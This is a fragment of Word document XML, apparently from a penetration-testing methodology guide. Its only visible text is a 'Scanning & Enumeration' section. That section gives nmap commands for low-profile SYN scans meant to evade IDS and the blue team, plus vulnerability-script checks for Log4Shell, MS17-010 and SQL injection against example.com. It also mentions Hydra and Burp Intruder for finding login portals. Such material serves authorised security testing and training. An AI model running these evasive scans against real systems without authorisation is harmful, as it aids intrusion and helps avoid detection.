          <w:p w14:paraId="72807CFB" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4647AEEE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="470EC324" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C611E63" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54D77B6E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69A6FF07" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4692A81A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0347D141" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75335BFD" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="639F3877" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5E15EA12" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09C19C8B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="2D6CA980" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6E46215E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2. Scanning &amp; Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="137B01D2" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>We understand that efficient scanning can save time. Here, precision scanning is crucial — wide, noisy scans can alert the blue team. You also aim to detect obscure services, so deeper techniques like timing manipulation and custom NSE scripts can reveal misconfigured assets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710193B4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648C45FE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Stealth Scanning</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Start with slow and low-profile scans to avoid IDS detection:  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p- -T2 -v example.com --max-retries 3 --randomize-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hosts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Leverage </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>service versioning</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">) and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NSE scripts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--script vuln</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">) to identify and verify vulnerabilities more precisely. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="746606CC" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nmap’s timing options</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to scan evasively or aggressively depending on the environment. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091FC509" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability Enumeration</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Automated scans with </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Nessus</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OpenVAS</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> identify CVEs, but as an expert, you often custom-build your </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NSE scripts</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in Nmap to tailor vulnerability scans to the specific technology stack you’re testing. </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --script http-sql-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>injection,http</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-vuln-cve2021-44228 --script-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vulns.showall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> example.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D6A6BD" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Port Knocking Detection</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Sometimes a service hides behind a series of knocks. Tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Knockd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be utilized here, and enumeration through </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite Intruder</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> might reveal login portals.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC76A8B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Executed Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p- -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -A -T4 example.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (All-port scan, version detection, and OS fingerprinting) - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --script smb-os-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>discovery,smb</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-vuln-ms17-010 -p445 example.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (MS17-010 exploitation detection) - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> --script http-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p80 example.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Enumerating web directories)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="404F0DB8" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33CE20AA" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05C7E4EA" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A59F9A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CE8B26F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16121DD9" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="500FD949" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B0F9BFE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70E003E9" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D02FB07" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56651F45" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
